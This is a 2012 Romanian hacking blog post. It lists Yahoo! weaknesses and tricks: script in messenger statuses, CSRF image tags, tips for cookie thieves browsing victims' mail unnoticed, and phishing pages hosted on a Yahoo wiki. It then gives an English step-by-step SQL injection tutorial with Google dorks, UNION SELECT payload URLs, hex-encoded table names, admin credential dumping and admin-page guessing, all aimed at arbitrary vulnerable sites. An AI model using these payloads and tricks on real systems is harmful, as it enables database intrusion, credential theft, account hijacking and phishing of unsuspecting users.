ClubHack Stiri, Informatii, Descarcari despre Hack & Hackers!

sâmbătă, 25 februarie 2012

YAHOO! VULNERABILITIES + TIPS AND TRICKS

1. Webmessenger China

- Eternul csrf

http://cn.webmessenger.yahoo.com - o aplicatie ce pare destul de normala pentru Yahoo!. Nu este chiar asa. Versiunea webmessenger din China nu este nici pe departe la fel cu versiunea de pe http://webmessenger.yahoo.com.

Care este totusi problema?

Logati-va cu un user pe http://cn.webmessenger.yahoo.com.
Logati-va cu un alt user pe clientul normal de messenger al Yahoo!. Aveti grija ca userul cu care sunteti logat pe clientul de messenger sa fie in lista de prieteni a userului logat pe webmessenger.
Setati pe clientul de messenger sa fiti online si puneti in status urmatorul cod:

Surpriza. Codul este executat in browserul pe care sunteti logat cu celalalt user.
Impact: tinand cont ca este vorba de csrf un atacator va poate fura sesiunea de logare sau va poate introduce un cod malitios fara a va putea da seama ca se intampla asa ceva.

2. My Chatroom trick

Stiati ca va puteti folosi de serviciile Yahoo! pentru a va creea propriul vostru serviciu de mesagerie?
Intrati pe http://cn.messenger.yahoo.com/webmsgr/code.php. Dupa logare vi se da un cod html ce contine un link. Ce puteti face cu acel link? Simplu. Sa luam spre exemplu acest link:
http://cn.webmessenger.yahoo.com/index.php?t=1&to=eWlkPXJvb3QuZmxvb2Q-&sig=63761f8f753f4857bf8a275e46d7b3175cba5585

Daca sunteti logati veti incepe o discutie normala cu userul ce a creeat acel link insa daca nu ati fost logati de dinainte si accesati acel link veti primi un nume aleatoriu cu care ii veti putea trimite acelui user mesaje, fara a intampina vreo problema.
Incercati si veti vedea.

3. Webmessenger.yahoo.com

Browser DOS

Am incercat sa aplic si aici vulnerabilitatea gasita in webmessenger varianta chineza insa rezultatele au fost diferite. Cu toate ca accepta anumite statusuri ce contine tag-uri html, aplicatia aflata la adresa webmessenger.yahoo.com nu suporta tag-uri gen . Rezultatul incercarilor de acest fel va fi acelasi indiferent ce browser veti folosi. O eroare flash9.ocx ce duce la inchiderea browserului. Pur si simplu este cel mai bun booter pentru versiunea web a faimosului Yahoo! messenger.
Nota: Versiunea din Yahoo! mail beta nu este vulnerabila.

4. Change password trick - interesant dar inutil

Voi explica pe scurt urmatoarea posibila problema. Stiti ca pentru a ajunge la pagina de schimbare a parolei trebuie mai intai sa reintroduceti parola? Probabil cei care fura cookies la greu stiu asta foarte bine. Ei bine pentru a ajunge la pagina respectiva este nevoie doar sa accesati urmatorul link https://edit.yahoo.com/config/change_pw?.src=ym (dupa ce v-ati logat deja in mail). Dupa cum spuneam, este interesant dar inutil atata timp cat nu stiti parola actuala.

5. Trick - Lista de messenger (nu address book)

Logati-va pe contul vostru. Accesati urmatorul link:
http://i.cn.yahoo.com/invites/picker.html?imp=yim

Veti vedea lista voastra de messenger pe pagina respectiva. Este util si in cazul in care v-ati logat folosind doar un cookie.

6. Trick - link catre avatar

Pentru a vedea avatarul unui user folositi urmatorul link:
http://img.msg.yahoo.com/avatar.php?yids=INTRODUCETIUSERULAICI& format=png

Pentru a vedea avatarul creeat de un user pe http://avatars.yahoo.com folositi urmatorul link:
http://lookup.avatars.yahoo.com/wimages?yid=INTRODUCETIUSERULAICI& size=medium&type=jpg

7. Csrf - cum sa activezi mail beta folosind image tag (trick).

Trimiteti cuiva ce foloseste Yahoo! mail Classic un attachement html cu urmatorul continut:

Dupa ce va vizualiza mesajul vostru mailul sau va trece automat pe varianta beta.

Csrf – Cum sa dezactivezi mail beta folosind image tag

Trimiteti cuiva ce foloseste Yahoo! mail beta un attachment html cu urmatorul continut:

Dupa ce va vizualiza mesajul vostru mailul sau va trece automat pe varianta Classic.

Atentie: la mail beta este posibil sa trebuiasca dat manual la imagini deoarece mail beta are optiunea block images.

8. Linkuri utile pentru hotii de cookies:

De cate ori s-a intamplat sa intrati in mailul cuiva iar acesta sa aiba mail beta activat si sa intrati pe id-ul de messenger al victimei fara sa vreti. Care este cea mai buna solutie pentru a nu avea de-a face cu messengerul deja prezent in versiunea mail beta dar in acelasi timp sa nici nu lasati urme cand schimbati voi manual versiunea de mail? Pentru ca victima poate accesa mailul oricand si sa observe schimbarea versiunii acestuia. Ei bine exista solutia "switch to classic mail just one time". Solutia este foarte simpla si depinde de... un url. Cand bagati cookie in browser aveti grija sa nu va mai logati din prima pe mail.yahoo.com. Folositi linkul:

http://us.mg1.mail.yahoo.com/ym/login?ymv=0

Acesta va accesa mailul classic fara a schimba permanent setarile originale pe care proprietarul contului le-a lasat. Simplu nu?

Pentru cultura voastra generala aruncati o privire si pe
http://us.mg1.mail.yahoo.com/dc/system_requirements?browser=unsupported

9. Trick - cum sa te loghezi folosind un simplu link

Nu stiu la ce v-ar putea folosi insa uitati 2 linkuri de logare:

http://n16.login.scd.yahoo.com/config?login=USERNAME&passwd=PASSWORD
http://edit.india.yahoo.com/config/login?.patner=sbc&passwd=PASSWORD& login=USERNAME&.save=0

10. Yahoo! Wiki - phishing cu ajutorul Yahoo!

Stiai de existenta Yahoo! Wiki? Probabil ca nu. Iata pentru ce a fost creeat:
http://developer.yahoo.net/hackday-wiki/index.cgi?action=revisions& page_name=HomePage&revision_id=22

Si iata cum se mai poate folosi:
http://developer.yahoo.net/hackday-wiki/index.cgi?NemessisRSTZONE

Notiunea de url spoof este foarte cunoscuta pentru majoritatea. Insa uneori nici nu mai e nevoie de asa ceva. Va puteti creea singuri o pagina pe acel wiki si sa introduceti orice content. Puteti injura pe cineva sau puteti cere userele si parolele celor ce citesc pagina respectiva. Frumusetea este ca puteti personaliza linkul folosit la phishing. Spre exemplu pagina:

http://developer.yahoo.net/hackday-wiki/index.cgi?NemessisRSTZONE va fi creeata in clipa in care o voi accesa. Voi da edit si voi pune continutul meu (spre exemplu I'm a legit Yahoo service. Just send me your password athacker@yahoo.com)
Oare in zilele noastre cati oameni ar crede un mesaj de tip phishing hostat pe o pagina a Yahoo? Presupun ca extrem de multi. O asemenea scapare nu ar trebui sa existe tocmai din partea uneia dintre cele mai atacate companii din lume.

11. Necunoscute sunt caile sesiunilor
Surpriza! Stiti ca exista limita de 24 de ore dupa care cookie-ul expira? Ei bine nu e chiar asa. Slick a descoperit o metoda sa ii prelungeasca viata cu mult mai mult de atat. Multi se simteau intr-o falsa siguranta cand se gandeau ca in cazul in care devin victime xss vor scapa de probleme in 24 de ore. Acum totul s-a schimbat. Metoda este si va ramane privata.

FULL DETAILED BASIC SQL INJECTION

An SQL Injection, is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information. Such as Emails, Usernames, Passwords, etc.
In this Tutorial, we'll be looking for the Admin Panel's credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily.

Finding a Vulnerable Site

You can find a vulnerable site using Dorks. Use google, it's the best way. A dork is something like this

inurl:news.php?id=

inurl:event.php?id=

inurl:order.php?id=

inurl:user.php?id=

inurl:restaurant.php?id=

inurl:buy.php?id=

There are Hundreds of Thousands of others, and there are also some Posts about Dorks, so you could read those if you want to find a good site to exploit with SQL Injection.

Exploiting the Database

Alright? Are you all ready for the fun of an SQL Injection? Okay, so first, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name for my Example:

http://www.hopefullyvulnerablesite.com/event.php?id=1
Our site HAS to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put a ' so that it looks like this:

http://www.hopefullyvulnerablesite.com/event.php?id=1'
Now if we get a MySQL error, then our site is probably vulnerable. If it just refreshes the page normally, then our site is not vulnerable.

Finding the number of columns

Now, we know our site is vulnerable to SQL Injection, so we want to start getting the Info out of the Database. But before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. But we don't know how many columns there are yet, so we need that first. To find the number of columns we need to use a command called 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--
Now if the site just refreshed to it's normal state, that's good. So we didn't get an error, so we have to continue until we get an error.

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--
*ERROR*

Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an
URGENT
The two hyphen's (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we NEED those at the end of every command.

Finding the vulnerable column

We now have the number of columns. But we just need to find out which one(s) are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--
A couple of number will appear on your screen. That is normal, and is a good sign. Those numbers, are the numbers of columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. So lets say that column 2 appeared on the Page. We will be executing commands in column 2.

URGENT
You HAVE to have the - after the =. That is critical.

Determining the Version of the MySQL Database

Why do we need the version you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.

So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--
Now it should display the Version on the page. It should look something like this:

5.1.47-community-log
The numbers don't matter, as long as they're at least 5, or over.

Finding the name of the Database

The name of the Database is important. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is:

http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--

Sometimes, that command will show you more than the Database name. But all we want is the database name, so the better command would prefferably be:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--
Now you will be showed the Database name. Congrats, look how far we are already. Now to the good stuff!

Viewing the Tables in the Database

The tables are what contains information. That's why we need to view them. So we can get the information we seek.

The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

Hit enter, and the Tables in the Database will be displayed.

[size=14]Viewing the Tables' information[/size][/u][/i][/b]

We will most likely be given many tables. It is up to you to decide which one contains the valuable information.

So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"

For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex.

To do that, I reccomend this site: [spoiler]http://www.swingnote.com/tools/texttohex.php[/spoiler]

Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73

URGENT
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.

Displaying the Contents

There will still be some tables inside the table you've chosen. So you need to get the information, and that will usually mean goodbye tables, and HELLO Admin Panel access.

Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--

That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. An where it says admin_credentials, you need to put the table that you are inside of.

Now we should have all the credentials, so we just need to find the Admin Login.

Finding the AdminLogin

Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin.

Like this:

http://www.hopefullyvulnerablesite.com/admin

http://www.hopefullyvulnerablesite.com/admin.php

http://www.hopefullyvulnerablesite.com/login.php

http://www.hopefullyvulnerablesite.com/admin/index.php

http://www.hopefullyvulnerablesite.com/login/index.php

http://www.hopefullyvulnerablesite.com/adminlogin

http://www.hopefullyvulnerablesite.com/adminlogin.php

http://www.hopefullyvulnerablesite.com/adminlogin/index.php

http://www.hopefullyvulnerablesite.com/moderator.php

http://www.hopefullyvulnerablesite.com/moderator

http://www.hopefullyvulnerablesite.com/modlogin

And there are plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it brings a more proud-ness after hacking the Website.

Abonaţi-vă la: Postări (Atom)